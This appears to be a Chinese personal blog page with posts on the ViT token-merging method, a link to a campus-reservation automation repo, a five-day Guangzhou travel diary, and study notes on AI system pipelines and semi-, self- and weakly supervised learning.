新的 “令牌合并” 方法可以无需额外引入任何参数即可直接插入到现有的 ViT 中,直接进行对于相似的冗余令牌的合并,无需重新训练即可提高吞吐量。

核心方法

双重软匹配

两个令牌是否相似,定义为两个令牌在自注意力机制 QKV 中 Key 的点积相似度。因为 Key 总结了每个令牌中包含的信息,所以这种方法比直接使用令牌特征向量的欧氏距离要更好。

接下来,作者提出了一种名为 “双重软匹配” 的并行化、渐进性的匹配方法(注意这里不是聚类算法,因为聚类算法没有限制可以合并成一组的标记数量,而这对于网络是不好的,当太多的标记被合并为一组时,他们的相关度可能会下降,从而导致网络的性能随之下降):

  1. 将标记划分为两个大小大致相等的集合 $\mathbb{A}$ 和 $\mathbb{B}$
  2. 从 $\mathbb{A}$ 中的每个标记引出一条边到其在 $\mathbb{B}$ 中最相似的令牌。
  3. 保留 $r$ 条最相似的边。
  4. 合并仍然连接的标记(合并方法为平均它们的特征)。
  5. 将两个集合重新连接起来。

由于此方法创建的是一个二部图,其连通分量十分容易查找。并且对于同一集合内的令牌,不需要进行相似度的计算,从而提高了效率。

标记大小跟踪

由于进行了标记合并,现在每个标记和输入 patch 不再是一一对应,而这会影响 softmax 注意力的结果。

为此,一个很自然的想法是,对于 softmax 注意力机制进行加权,也即,合并次数较多、代表 patch 数量较多的令牌,我们给予其更高的权重。这就是 “比例注意力” 机制:

$$ A = \text{softmax}\left(\frac{QK^\top}{\sqrt{d}} + \log s\right) $$

其中,$s$ 是一个行向量,包含每个令牌的大小(即每个令牌所代表的 patch 数量)。

可以理解为,原先是:

$$ \text{softmax}(z_i) = \frac{e^{z_i}}{\sum_{j} e^{z_j}} $$

现在,对于其中某个 $z_i$ ,我们假设其进行了 $s$ 次合并,那么其进行 softmax 时,从 $z_i$ 改为了 $z_i + \log s$,再经过 $e$ 的指数运算,就得到了 $s \times e^{z_i}$,相当于其权重被放大了 $s$ 倍。

这种方法确保了合并后的令牌依旧能够正确反映其所代表的多个输入 patch,从而保持了注意力机制的准确性。

💾

北京大学全自动预约入校

2024年8月10日 06:29

连着好几天零点抢入校预约,经历了好几次 1 分钟秒没,气急败坏的我决心彻底自动化这个过程...

于是,就有了这个仓库

https://github.com/zhuozhiyongde/PKU-Auto-Reservation

💾

广州行

2024年8月9日 03:12

阅前须知:本文为超级小学生流水账,约 2w 字,仅供图一乐,慎点

去哪里?

随着暑假的时间一天天在游戏、B 站、知乎中消磨殆尽,我逐渐萌生了出去旅行的想法。最开始的备选选项很多,杭州、广州、重庆、深圳……最终使我下定决心的契机出现在了 QQ 群,当我看到友人 L 因为要去广州办理美签的原因成功和另一位友人 S 面基,再又琢磨了一下似乎打出生以来我就没有去过广州这个城市,于是我选定了广州作为目的地。

有了抉择后,我并没有像很多人一样预先去做攻略,尽管我草草地问了几位朋友广州有啥玩的,但心中似乎还是很抗拒还未亲身抵达就预先把自己塞到条条框框里的感觉,~~也有可能是拖延症犯了~~,一直到我出发,我都没有为这趟行程做出任何安排。

Day 1

意识到即将远离北京,临出发的我犹如打了肾上腺素一样无法入眠,翻身起来上 B 站随便找了几个广州的旅游视频想要大致描绘一下未来几天的样子,北京路、陈家祠、广州塔……一个个名词开始闯入我的脑海并开始具象化,遥远的事物们似乎都即将变得触手可及,困意的来临被再三推迟,最终,我成功达成了只睡两个小时的壮举。

凌晨五点半,起床开始收拾行李。是的,我直到要出发才开始做这件事,因为我的行李很简单,我的所有电子设备——正如上学时一样,以及几套换洗的衣物,再加上钱包,检查一下身份证,Over,出发!

乘车来到麦当当,带走点好的早餐,然后直奔首都机场,一边吃着,一边感慨原来到机场只需要半小时车程,临下车炫完了四件套的三个,汉堡、可乐与香肠,拎着剩下的粥(很快它就会陨落在安检门口)和行李箱,我人生以来第一次,独自一人站在了机场门口。

由于之前总是和家人或者朋友一同出行,我并不怎么经手登机前的过程,都是照猫画虎地有样学样,结果就是这次好似一个首次来机场的人一样,凭着依稀的记忆一边问着一边做,完成了值机、打印登机牌、托运的过程,然后抬表一看,才惊觉我去怎么已经剩下 45 分钟了,拎起背包开始快进,排队过安检的时候又不禁感慨首都机场确实没法和新建的大兴机场比,各种地方都满是了~~年久失修~~岁月的痕迹,布局动线什么的相对简陋,但来不及接着感慨,我就已经走到了登机口前。

这个时候突然想到我忘了提前缓存一些视频来打发飞机上的时间,于是又赶忙退出本在前列的队伍,掏出 iPad 开始在阿 B 缓存各种悬疑剧集的讲解,机场的网速似乎并不那么令人满意,不过最终还是赶在 Last Call 结束之前缓存够了足够我看两三个小时的视频数,这才充满信心地上了飞机。

在廊桥远眺了一下清晨里的北京,随着引导坐到了座位上,长出一口气点开视频开始播放。随着一遍遍的广播结束,倒车,校准,加速,推背,芜湖起飞!脑中跳脱地想起一句话,“朝暮与年岁并往,然后一同与你行至天光”。

飞行的过程乏善可陈,我并没有预期中一样沉浸在剧情,韩剧解说类视频的快速与千篇一律的脸谱让我总也记不清到底有多少人物,于是很快就在昏昏沉沉中睡去。

美梦与航程一样短,没睡多久就被落地的感觉唤醒,跟随引导走出飞机进入廊桥,远远地就看到了机场边那只在书上见过的棕榈树,广阔平坦的机场之上是堪称恢弘的洁白云朵与背景的湛蓝天空,摸出手机以 0.5x 的广角拍了一张照片,这才有了真切的、已然踏上未知土地的感觉。

image-20240806210656234

等行李的过程中,我终于开始做起来本应在启程之前就做的事情——订酒店,快速闪回了一下之前浏览过的视频,再浏览了一下地图,便选定了北京路作为今天的第一站,又赶忙下载了携程,找了一家临近的酒店预定(是的,如果没记错的话,之前每次旅游我也从来不会插手这些事物,只会无脑开启自动跟随),找到行李后,进入了地铁。

画面一晃,从地铁出站口刷新出来,午后的太阳便开始毫不留情地展示它的威力,出站口犹如冰火两重天,退一步是空调带来的舒适与凉爽,进一步是数十秒就足以让皮肤开始泛出汗珠的炽热。尽管如此,老城区不一样的街景仍然引得我偶尔驻步,宛若新生儿一般张大眼睛东看看西看看——这个暑假在屏幕前独坐许久,眼睛的焦距甚至都被固定,于是出门走走,即使是平常的景物都变得足以调动起了眼睛与情绪,更何况是一座对我而言充满了未知的城市。

话虽如此,日光还是催促着我拉着行李箱奔向酒店,办理入住进了房间后,第一件事当然是打开空调。当凉风开始驱散热浪,我便抬起了手机开始搜索吃喝玩乐的去处。发现不远处就有一家评分不错的煲仔饭,同时震惊地得知原来广州这里会在下午 14:00-17:00 的时间停止营业,便又匆匆出门,赶在结束之前到店下了单。广州这边的物价真的出乎意料的便宜,一顿饭普遍 15-30 以内,但是在北京如果想吃到这种基本都在 30~50。

image-20240806210932363

我点的是牛肉煲仔饭,实话说口味感觉谈不上什么特别,略微有些后悔没点香肠的。倒是那个酱料值得一提,由于我是第一次尝试,感觉没把握好量加得有点多,结果就是有点咸了呜呜呜。

吃饱喝足,那便准备开始四处逛逛。紧急和友人 E 交流了一番旅游心得,同时回忆了几次之前旅游的经历,感觉我确实不像是那种喜欢在景点来回奔走的人,而是更喜欢走街串巷观览沿途生活。于是我没有选择打车,而是扫了辆共享单车就冒着吃饭时突然开始下的雨向北京路慢慢蹚过去。

image-20240806210738559

image-20240806211701134

image-20240806211713281

一路上走走停停,随手胡拍乱照,也并不追求什么构图与美感,仅仅是感受着这与北京完全不同的场景,似乎便足以令我欢欣雀跃。

终于摸到了北京路,人流的密度与景致却莫名地开始变得熟悉了起来,与南京路、王府井相差不大的各种连锁品牌,琳琅满目的小吃与餐馆也无法激起刚刚吃饱喝足的我的食欲,沿着主干道猛猛一通走,结果又看到了令我哭笑不得的圆角矩形 3D 大屏——这个东西究竟是何时开始成为了全国步行街标配啊!

image-20240806212545756

又走了一会,终于离开了北京路的地界,打开地图发现附近似乎有几个古代建筑与博物馆,于是奔去,却又无奈地发现人家 17:00 就下班了,不过我确实对这种景点也兴致不大,便又拍了几张照片就开始往西走——那里听说有一条不错的西华路小吃街。

image-20240806212741143

image-20240806212749353

坦白说我走的过程中并没有意识到我会很快地走到动漫星城——这本是我原定的另一个一定要去的地方,因为听群友安格说这是一个二次元圣地。所以当我偶然间走到它门口的时候确实蛮惊喜的,有种不期而遇的感觉。

跟随人流进入地下,我才发现这里果然名不虚传。数层的地下空间内,遍布了大大小小近百家的二次元谷店,各种或热门或小众的 IP 都有覆盖,从亚克力制品到手办可谓无所不包,更别提那遍地都是的、顶着颜色各异的假毛的 coser 们,犹如进了漫展一样的感觉让我颇为满足。

image-20240806213658150

image-20240806213705082

image-20240806213803073

image-20240806213819096

image-20240806213834972

在拍了大量的照片后肚子终于发起了抗议,我这才惊觉已然是接近晚上七点。出了动漫星城,接着向西华路赶去,一路上又是走走停停,不过此时的气温确实也算是终于降到了还算可以接受的地步。日落时分悄然过去,我才终于抵达了西华路。

image-20240806215355585

到了西华路,瞅了一下美团,附近的小店选择颇多但我却不知道哪个比较正宗,于是在群里问了友人 S 这个本地人,得到了一家叫做炜明肠粉店的推荐,结果赶过去才发现已经下班。果然没做攻略的后果就是旅途必定充满各种意外,虽然我也乐在其中,但“苦一苦肚子,乐子我来背”,我还是决定向江边走去,路途上看到啥吃啥。

广州的商业繁华程度最终还是没让我的肚子失望,走着走着就看到了一家叫做银记肠粉店的,想着大差不差就进去点了一份,这也是我第一次吃肠粉,只能说出乎意料的好吃,不仅入口即化,鲜嫩多汁,口感层次丰富,而且咸香适中,更是增添了一份鲜美。

image-20240806220947892

大快朵颐后继续向江边走去,期间还误触把行程共享给了另一位好友闹了笑话,但当我真切地走到江边,江风吹过,我还是瞬间体会到了这份独属于广州这座城的惬意。

image-20240806221028031

并不算宽阔的江面两侧行人来来往往,有网红在拍照,有跑者在奔跑,有情侣在言笑,也有像我这样的游客百无聊赖地吹着江风,漫无目的地走着。景观并不算壮丽,难得的是闲适的风吹拂而过,好似吹开了那些长久以来一直盘旋在心头的焦虑与压力,如果让我用一个词来形容此时的我,我必然会选择“自由”。

北京城森严而肃穆,在城中心走只会感觉到权力的不苟言笑,而广州城中心是这样的自在,珠江穿流而过,每个人都可以做着自己的事情,自有江风与尔同行。

沿着江继续慢慢地走回酒店,首日的行程至此也就结束了。

Day 2

待到被生物钟叫醒,已经是正午时分。惯例般的先摸鱼刷了一会社交媒体,定下来了今天的去处是广州塔及其周边,然后就在附近定了一家 Lofter 作为当天的酒店。想起昨天后悔没有吃到香肠煲仔饭便又前往,却被告知等位就要半小时,算了算时间感觉有些离谱,便打车到了新一天的酒店办理入住。

推开酒店的房门,就发现了 Lofter 竖长的落地窗恰好足以眺望 CBD 的边缘高楼城景,甚合我心。

image-20240807024352749

放下行李未做久留,我便前往了今天的第一站——时尚天河广场。同样是因为在 B 站上看到说这里的小吃较多,到了现场却发现还是小店居多,有座位的较少,遂挑了一家顺眼的香港餐厅坐下来下了单。口味还算凑合,但确实让特地赶来的我有些失望。

在出口处还发现这里还在举办广美的一个小展览,但可能是狭小的空间让作品的表现力有所折扣,走马观光地浏览一遍便走了。

从时尚天河广场出来,沿着中轴线直行,身边满是一幢幢拔地而起的高楼,其密度之可观、层数之多远胜于限高的北京城。又经过了几个街道后便突然闯入了 CBD 中心的绿地,情难自禁地开始惊叹于布局的巧妙,自然的景观与巍峨的高楼交相辉映,予人以无限的遐想。

image-20240807025900582

本想沿着绿地走到省博,可惜室外的温度还是让我不得不打消了这个念头。转身进入 APM 线,便立刻发现了这条线路的与众不同——过于短小的站台与颠簸的列车真的犹如玩具车一般,不过空调还是实打实地救了我的狗命。

从地铁出来,便看到了广州市图书馆。本想在此稍作驻留,甚至故作文雅地看看书,却又想起前一天错过南越王博物馆的经历,赶忙查了一下广州省博物馆的开放时间,发现距离闭馆也不过两小时,便又是先赶了过去。

“得益”于我不做规划,免费的预约票早已抢购一空,别无他法的我只能买了特价票进入。博物馆里的内容其实并不能令我提起太大的兴趣,不过本着来都来了的中华民族传统心态,我还是走遍了整个博物馆。走马观花地浏览完各个展区,甚至收集完了整个自然矿产区里出现在 Minecraft 里的矿石后,我才最终走出了博物馆。

走出了博物馆,离日落时分还有一个小时左右,便又回到了近在咫尺的广州市图书馆。好不容易才寻得一个座位坐下。尽管一路上发现很多人其实都没有在看书而是在做着各种和看书毫无关系的事情,但我最终还是没好意思在这个地方打开 B 站。于是懒得再去特地找书看的我便打开了还没看完的李沐老师的《Dive into Deep Learning》继续阅读,甚至在不懂的地方还去温习了一下一年前学的线性代数,虽然有些故作姿态的嫌疑,不过我最终也确实还是看了进去,乐。

看到快要日落,收起 iPad,走出了图书馆,天空又开始下起了小雨。冒着雨,我步入了中心的广场。放眼望去,广州塔在大只的云朵下显得格外优雅,回过头看到的两排高楼却又让我感觉好似站在了 2077 里的市中心,满满的压迫感。

image-20240807032325465

image-20240807032310950

image-20240807032559533

随着我一步步靠近广州塔,天色也变得逐渐暗淡了下来,云朵开始染上余晖的灿烂,灯光一点点亮起,似是在宣告夜晚的主权。

image-20240807033216358

继续沿着中轴线走到江边,夜幕便已然彻底降临。又漫无目的地走了走,终于是被无处不在的蚊虫打败。遂打车前往了和友人 S 约定的大排档,耐心等候。

待到友人 S 刷新在我眼前时,却是有点不敢相认——友人 S 的穿着过于艺术,实在是与印象里的技术宅男大相径庭。

对本地美食一无所知的我自然地把点单的任务交给了友人 S ,然后我们便开始了有一搭没一搭的闲聊,从吐槽大排档这个就餐地点,到大谈特谈社会经济形势,再到服务器里各种日常琐事,尽兴不已。

分别后回到酒店的我久久无法入眠。于是我爬起来下了楼,将沙发转向了落地窗,以一个舒适的姿态开始眺望了起来。

image-20240807040747785

思绪逐渐发散,一个人呆坐良久后终究是耐不住分享欲,给远在大洋彼岸的 hxd 打去了跨洋电话,又聊了整整四十分钟,一直到接近凌晨五点才终究是在睡意的侵袭下睡去。

Day 3

这天是被酒店前台催促退房的电话叫醒的,抬表发现不过睡了五六个小时,又赶忙起来收拾行李,才赶在时限之前退了房。呆坐在酒店大厅门口刷了会手机,决定去到中山大学转转。在附近订好了房间便打车赶了过去办理了入住,盛夏总是让人难以迈出步伐踏出空调房,可最终还是在肚子的催促下无奈放下手机。

询问了就读于中山大学的友人 X 得到了一家叫做彩点的本地美食推荐,到地之后才发现又忘了这里 14:00 下班的惯例,错过了饭点,只能在友人 X 的推荐下点了一些下午茶,虾饺皇与红米肠。端上来之后也口感果然超出了预期,皮薄馅多,虾仁鲜嫩多汁,口感丰富而不腻。不禁再次感叹广州美食之都的称号果然是名副其实。

image-20240807205702268

image-20240807205714629

吃完饭自然就是前往中山大学观览,盛夏固然难以忍受,但湛蓝的天空倒是成为了些许补偿,云朵洁白的耀眼,树木也是那么的绿意盎然。

中山大学给我的感觉与清华差不多,广阔的校园内行人寥寥,教学楼也大多落了锁,无从观览,无奈只能顶着烈日,在外信手拍了大量意义不明的照片后,躲进了带有空调的瑞幸。

image-20240807205823702

image-20240807205831070

image-20240807205905232

image-20240807205932340

临别中山已是接近 17:30,想起了前一天友人 S 推荐的二沙岛还没观览过,便打了车准备前往。没曾想离开的路上遇到了一直可爱的小猫,便逗弄了一会。

image-20240807210904493

也许是我的手法不太熟练,惹了猫师傅不满意,不讲猫德搞偷袭,两次张口将我的虎口咬到了嘴里,赶忙抽出加以检查,所幸猫师傅大概只是为了警告,没有下口见血,否则我大概要放弃行程前往医院打针了,害,看来想要撸猫还是得去正规的猫咖。

待到刷新到二沙岛,阳光也开始收敛它的锋芒开始变得柔和了起来,气温渐渐降了一些,正是拍照的好时机,抓起相机又是一顿乱拍,相当尽兴。

image-20240807211239319

image-20240807211247792

image-20240807211255921

绕了一圈后行至江边,听到了大爷们的粤语合唱,亦与珠江再度重逢。隔江眺望着广州省美术馆,还见到了一位一把年纪下江游泳的大爷,着实可乐。

image-20240807214429246

拍完照片本想去动漫星城故地重游,可时钟却告诉我日落将近,留下来或许可以拍到更美丽的晚霞甚至火烧云,便把选择权交给了群友,然后从谏如流地呆了下来吹江风。

image-20240807211810013

只可惜运气不佳,没有等到所期待的场景,反倒是被蚊虫又蜇咬了几次,最终还是带着不甘离开了江边前往和群友约定好的干饭地点,又成功会师了四位因服务器熟识的友人,吃了一顿颇为尽兴的潮汕牛肉火锅。这里的牛肉真的很新鲜很嫩,短短十数秒泡完便可以入口,照着朋友调的酱料也口味适中,比海底捞好吃许多,而且物美价廉,点了五六盘印象里也才四百出头。

大家就着服务器聊了半天八卦,作为一个技术组的成员确实是未曾听闻过这么多的故事,于是我一边上贡牛肉一边感慨果真是有人的地方就有江湖。我们一直聊到了店铺打烊才彼此告别。我想起昨天与友人 S 未能成行的江边闲聊,便又约着友人 S 到了江边畅聊。许是近日听闻的诸多别样人生给了我一些感怀,我破例饮了人生的第一杯酒——度数不高的葡萄酒,入口后带来的是一种怪异的感觉,口感绵长,味道介于涩和酸甜之间,换做平时的我大概会在喝了第一口后就弃之而去,可这次我还是喝完了,甚至还又饮了一些鲜啤。我们又开始了有一搭没一搭的闲聊……我打趣说自己此次广州行好像把自己从过往的人生轨迹中抽离了出来,而喝了酒之后又好似把本就抽离了的我又抽离了一次,我观察着自己身体的有趣变化,语言开始变得跳脱与偏向直觉,反应时间被延长,果然我还是很难喜欢上这种感觉,不过一次两次似乎也无妨就是了。

image-20240807213810208

回头一看,“人生得意须尽欢,莫使金樽空对月”的牌匾恰是高悬酒家梁上,颇为应景。

image-20240807213843043

话题越聊越少,可上头了的我却开始突发奇想想要留在这里看日出,疯狂的念头最终还是被理智打败,我们还是打车回了酒店后分别。

Day 4

不知是酒精还是意识作用,这天仅仅睡了两个小时我便醒了,惯例的摸鱼了会后又才接着睡了回笼觉,再度睁眼已近下午两点。匆忙地办理了退房后开始思索今天的安排,想到晚上要去和友人 S 一起看 Live House,便把酒店订到了昨夜畅饮的太古仓附近。本想打车前往了酒店安置好行李再外出觅食,可看了一圈好像还是中山附近餐馆众多,于是拖着行李箱又随便找了一家港餐坐下大快朵颐。

终于吃饱了便打车到了酒店放好行李,思来想去还是选择了昨天远远眺望的广州美术馆作为今天的第一个目的地,打开手机果不其然预约早已排到 8.8,无奈再次买了特展票,到地之后也没来的及细看便进了展厅,结果这一侧是文学馆与非遗馆,无奈才疏学浅,逛了半天好像也没受到多少艺术熏陶,只是感觉腿累。

image-20240807215840585

image-20240807215826426

出来之后看到天气不错便又在馆外拍了几张照片,结果就因为这耽搁了一会,待到真正到想要看的美术馆时被告知已经即将闭馆不再允许进入,想着明天也能再来便也没有强求就此作罢。

image-20240807220119026

image-20240807220201123

逛完这里便又前往了和友人 X 约好的动漫星城,果然周末人流量远胜上次来的工作日,说一句人流如织并不过分。各种 coser 着实是又过了把眼瘾,本想着社恐的我拉上社牛友人 X 之后再去集邮,结果干饭的时候才得知他居然是带着女朋友来的,然后把女朋友放养了去买谷子来和我吃饭,他真的我哭死。

天光渐渐淡了下来,和友人 X 分别之后的我又在动漫星城漫无目的地逛了一会,最终在天闻角川的店里买了两个物件权当纪念。最终还是没能鼓起勇气去和 coser 合影,不过仅仅是四处逛逛便已是心满意足。

赶着 Live House 的开始时间到了现场,友人 S 迟到了我便独自一人先行进入了。这是我第一次听 Live House,当强劲的音浪袭来,我真切地感觉到五脏六腑都在与之共振,不得已套出了耳机打开降噪模式。我们听的是 There is a light 这个乐队,之前考试季听了许多许多遍他们演奏的《We choose to go to the moon》,可惜身临其境之时并未听到熟悉的旋律,不过乐队的演奏还是深深震撼了我的心灵,舞美的灯光交替闪烁,四周的人群随之舞动,而我也彻底沉浸在了音乐之中。

image-20240807221934868

image-20240807221955039

待到友人 S 赶到,一起听了一会便被他拉到场地后方,耳朵的压力也有所减小。

演出比预想的结束的要快,从 Live House 出来我们又闲聊着回到了昨晚畅饮的酒家附近,目睹了樊振东的夺冠。

image-20240807222553176

继续走了一会终究是耐不住热带的积温,晚上十点多还能有 30℃ 实在是太过可怕,吹了一会江风后我们便走回了酒店接着胡吹,或许是我确实不太擅长聊天,话题其实并不多,但我们还是能够聊得颇为尽兴。

我们的相处现在回想起来似乎是那么的无厘头:友人 S 穿着一身长衣长裤,趁我不注意把空调调到了 16℃,我直到冷得发颤才注意到;没带长衣服的我拿出了浴巾披着取暖,真的是颇为搞笑;学长的预约需要多台设备零点准时开抢,我便分了友人 S 一台手机来帮忙一起抢,结果发现电脑需要 2FA 验证还着急地催促着他搞快点;我掏出自己上课的笔记,和他吐槽还不如他自学的实用……

最快乐的时光出现在友人 M 突然发来消息说服务器的网站宕机了,于是我们便开始凌晨一两点的上工。友人 S 是技术达人,可最终最复杂的保护措施拦住的都是自己。需要远程回到家里网络环境上工的友人 S 被自己设下的保护措施拦在外面,用我的电脑尝试许久也没能成功抵达自己的主机,直到最终才发现是酒店公用 WiFi 的网段与家用网段重合了才导致原本正常的措施一一失败。

image-20240808183559403

我们点了烧烤喝着饮料一起 Debug,然后一边撸着串一边尝试着各种不同的可能方法,小小的干杯之后再次投入了工作,也不时求助 GPT,而当问题最终以浅显的路由表做结的时候还是没忍住破口大骂,直呼离谱。

image-20240808192211808

赛博回家的友人 S 很快就修好了问题,而时钟也逐渐转到了接近四点多,我们这才再次分别。躺在床上的我闭眼回忆着这一晚的乐子,心想着不知何时才会再有这么快乐的时光……

Day 5

最后一天的行程原定是去昨天没能成行的美术馆看看,结果一起床就收到了友人 S 的消息告知美术馆周一闭馆,顿时开始懊恼为什么昨天没有和保安强硬一点闯进去速通一下,不过正如懂王说的,“也许这就是人生”,总是有着各种偏离预期,总是有着各种不如意,但本就是为了旅游而来的我也很快释怀了,本就已经相当尽兴,留下些许遗憾又算得上什么呢?

想通了的我很快起床办理了退房,在酒店大堂寄存好行李后又得知了飞机延误的消息,原本以为延误到了零点,所幸和朋友聊天的时候又确认了一下是延误到了零点降落,这才没有错过。摸出手机接着开始安排这最后一天的行程,想着不如吃点好的便上了树洞搜索,得到了一家叫做泮溪酒家的推荐。一看时间已近 14:00,已经吃过亏的我赶忙提前电话沟通下了单,这才避免了没有正餐的厄运。

image-20240808184031652

打车过去后,自己一个人吃起了双人餐,没有额外安排的我便也没有急着下箸,反倒是慢慢细品了起来。

image-20240808183926056

不得不说广州真的是好吃还便宜,这一顿 5 个菜才一百出头。小茶一喝,小饭一吃,慢悠悠刷起下饭视频享受了起来,仿佛时间都在这一刻静止,好不惬意。一顿饭吃了一个小时还剩一半,一直吃到服务员开始赶人才打包开润。

image-20240808184355503

image-20240808184649330

出了餐厅看了下地图发现周边就是荔湖湾公园,绕道进去了之后发现游人不多,大多是本地人在一边乘凉一边聊着天,四处走了走很快在阳光面前败下阵来,恰好走到了一家名为 1200book&bed 的特色书店面前,步入之后才发现这里有多么的有趣、充满个性。

image-20240808184835142

image-20240808184852653

image-20240808184908014

image-20240808184917514

书店的装修并不花哨,反而是和周围的古建筑融入得很好。各处张贴着离经叛道的吐槽标语,罗列着五花八门的书籍,还有着咖啡店与可供躺下的床铺房间,不得不说其理念确实让人惊喜。倘若不是晚上就要飞走,或许我真的会在这里订上一晚体验一番。不过稍微查了一下才得知这家店在疫情期间也经历过倒闭风波,可仍然坚强地活了下来。看到明信片上的留言,也不知道其中梦想实现了多少,但这种与他人故事不期而遇的感觉,确实还是让自己有所感触。

正如前文提到的,此番出行总让我感觉自己过往人生过于循规蹈矩,而当面基了众多群友、看到这些明信片的时候,就会给我一种异样人生在面前展开的样子。它们就好似在对我说:“人生不一定就是你预期里的那个样子,你有万千可能”。我并不憎恶我做出的各种选择,因为我知道正是它们造就了现在的我,可“我本可以活成别的样子”这个想法终究是在脑海里生了根,希望我的未来可以多一些不确定性,而不是永远保守地选择确定性最高的道路去走吧。

image-20240808190334907

终于到了临别之际,带着不舍与这个本次广州之行最后一个景点告了别,便打车回了酒店去取回寄存的行李。走出酒店的时候,阳光依旧炽热,天空依旧澄澈。

终于到了机场,轻车熟路地完成了各个流程,坐在候机的座位上发呆许久,刷了一会视频可总感觉心似乎不在这里,便定好了闹钟准备小憩一会,没曾想就在即将阖眼的刹那,余光瞥见了天光逐渐变换出了火红的色彩——是火烧云!是这趟旅程一直没有见到的风景!

睡意瞬间被驱散,起身手忙脚乱地在大厅里四处奔跑照了几张照片,结果发现透过窗户拍摄总有着反光,便又拿出了 iPad、电脑、甚至是最后才顿悟的、没有托运的雨伞来遮光,终于是拍到了几张满意的照片。

image-20240808191331896

image-20240808191444191

四处拍照的我最终又是赶着 Last Call 才心满意足地登上了飞机,与这座城市彻底挥手说了再见。

我想,我应该必然会与之再度相见。

💾

人工智能系统实践

2024年6月15日 15:32

AI 系统实践流水线

AI_pipeline

  • 问题形式化:找出最重要且可行的问题

  • 数据:确保数据质量和隐私安全

    挑战:高质量的数据是永远稀缺的;隐私安全

  • 模型训练:选择合适模型,优化训练

    挑战:现在的模型越来越复杂,对数据的需求越来越大,训练代价大

  • 模型部署

    挑战:复杂模型的实时推理能力差(要考虑硬件资源受限的情况下怎么办)

  • 持续维护:应对数据分布变化,定期更新模型

    数据分布产生变化:指数据的统计特性(如均值、方差等)随时间发生变化,导致模型在新数据上的表现变差。

    ~~比如说你写了刷课机要过验证码,本来能过,结果验证码换了个版本增强了,过不去了,这时候就要维护,如更换更强的 CNN 模型,或者直接使用专业的商用 API(持续维护)~~

数据获取

  • 获取并准备高质量的数据集。
  • 清洗和预处理数据。

获取、整合外部数据

常见方法:

  1. 有官方的 API,直接请求

    ~~(有的时候官方 API 没有显式告诉你,但是你可以自己找,比如刷课机)~~

  2. 没有官方的 API,使用爬虫来爬取公开网页,从而获得数据

    • 不要抓取 敏感 信息
    • 不要抓取有 版权 的信息(除非有开源协议)
    • 遵循网页的条例说明
    • 商用要咨询法律建议

生成数据

当没有现成的数据 / 现有数据不足,但是有数据生成方法的时候,我们可以使用生成的数据来作为训练集。

生成数据是指通过一定的方法或技术,创造出新的数据。这些方法包括但不限于:

  • 生成对抗网络(GAN):通过两个网络(生成器和判别器)相互竞争生成新的数据。

  • 数据增强:对现有数据进行各种变换,以增加数据量和多样性。

    如麻将大作业中的换花色,图片分类中加滤镜等

  • 模拟器:使用计算机仿真生成特定场景或环境下的数据。

数据标注

  1. 有数据吗?

    • : 如果有数据,继续下一步。
    • : 如果没有数据,需要先获取数据(见前文)。
  2. 添加标签了吗?是否改进了数据表示?

    • 数据预处理(Data preprocessing):如果想要改进数据的表示,需要进行数据预处理。
  3. 初始标签数量足够吗?

    • : 如果初始标签数量足够,可以使用半监督学习。

      半监督学习(Semi-supervised learning): 使用少量已标注数据和大量未标注数据来训练模型。

    • : 如果初始标签数量不足,继续下一步。

  4. 预算足够吗?

    • : 如果有足够预算,可以使用众包。

      众包(Crowdsourcing): 通过外包给大众来获取大量真实标签。

      网约车、外卖也可以理解为众包!

    • : 如果预算不足,使用弱监督。

      弱监督(Weak supervision): 使用弱标签(不精确或部分标注)来训练模型。

半监督学习 Semi-supervised learning

  1. 利用已经标记的部分数据训练一个还不错的模型
  2. 用这个模型预测得到的结果,选择 置信度高 样本的预测值作为 伪标签,把这些样本加入训练集,重新训练

半监督和监督学习的区别:半监督输入 同时包括标注和未标注数据

不能使用未标注的训练样本作为测试样本。

自训练 Self Training

self_training

SSL 不是 SSL 证书,是半监督学习 Semi-supervised learning

步骤(同前文)

  1. 训练模型
  2. 预测结果
  3. 高置信度预测样本加入训练集
  4. 重新训练

问题

  1. 高计算成本

    由于需要反复迭代进行重新训练,计算成本较高。

    虽然减少了标注数据的成本,但增加了计算成本,需要在两者之间进行权衡。

  2. 误差累积

    高置信度的预测样本也可能是错误的,从而产生误差累积。

    高置信度阈值可以使得预测错误的概率较小,但会 减少伪标签样本的数量

    所以,选择合适的置信度阈值非常重要,需要平衡误差和伪标签样本数量

主动学习

active_learning

主动学习改进了自训练,对于置信度低的样本,用人来标注。

人在回路(Human in the loop):在主动学习中,人类专家会参与进来,为模型选择的样本进行标注。

不确定性采样(Uncertainty Sampling):选择模型预测最不确定的示例进行标注。

例如,模型对某个样本的预测接近随机(每个类别的预测概率接近 $ \frac{1}{n} $,其中 $n$ 是类别数),这种样本被认为是最不确定的。

委员会查询(Query-by-committee):训练多个模型并选择这些模型意见不一致的样本进行标注。

这样可以找到模型最难以确定的样本,进而提高模型的性能。

弱监督

弱监督学习是指 使用不完全、噪音较多或不精确的标签 进行训练。

半监督学习不属于弱监督学习,半监督的标签数据是准确的。

自监督 Self-supervised Learning

自监督学习:通过数据自身构造预测标签的监督学习方法

利用数据自身来生成标签,而不需要人工标注( 所以自监督属于无监督学习 )。通过数据内部的结构或特征,模型可以学习有用的表示。

  • 文本自监督任务:预测下一个词(GPT),完形填空(BERT)

    文本大模型都是基于自监督学习任务

    语言模型:给定一句话的一部分,模型需要预测接下来的单词。例如,给出 “我今天吃了”,模型预测 “苹果”。通过这种预测,模型学会了语言的语法和语义。

  • 图像自监督任务:视频预测下一帧,拼图,对比学习

    图像填充:给定一张部分遮挡的图片,模型需要预测被遮挡的部分。通过这种方式,模型学会了图片的结构和内容。

自监督学习主要用于训练 特征提取器

针对特定任务,通常仍需相关标注数据

对比学习

对比学习:是一种自监督学习方法( 所以也属于无监督学习 ),主要用于训练神经网络以学习有意义的表示(representation)

  1. 正样本对:从 同一个图像 通过 不同的增强方式 (如修改颜色、裁剪等)得到两个不同的版本,这两个版本作为正样本对。

    例如,图像 A 经过颜色调整后得到 A1,经过裁剪后得到 A2,那么 A1 和 A2 就是一个正样本对。

  2. 负样本对:从两个 不同的图像 分别进行增强,得到的两个样本作为负样本对。

    例如,图像 A 增强后得到 A1,图像 B 增强后得到 B1,那么 A1 和 B1 就是一个负样本对。

  3. 损失函数(Loss):用来衡量一对图像之间表示向量(representation vector)的相似度。

    正样本对的表示向量应该尽可能相似,而负样本对的表示向量应该尽可能不同。

    常用的损失函数是对比损失(Contrastive Loss)或 InfoNCE 损失。

各种学习方式总结 [^1]

  • 监督学习:使用完整和准确的全标注数据。

  • 半监督学习 使用一部分标注数据和一部分无标签数据。

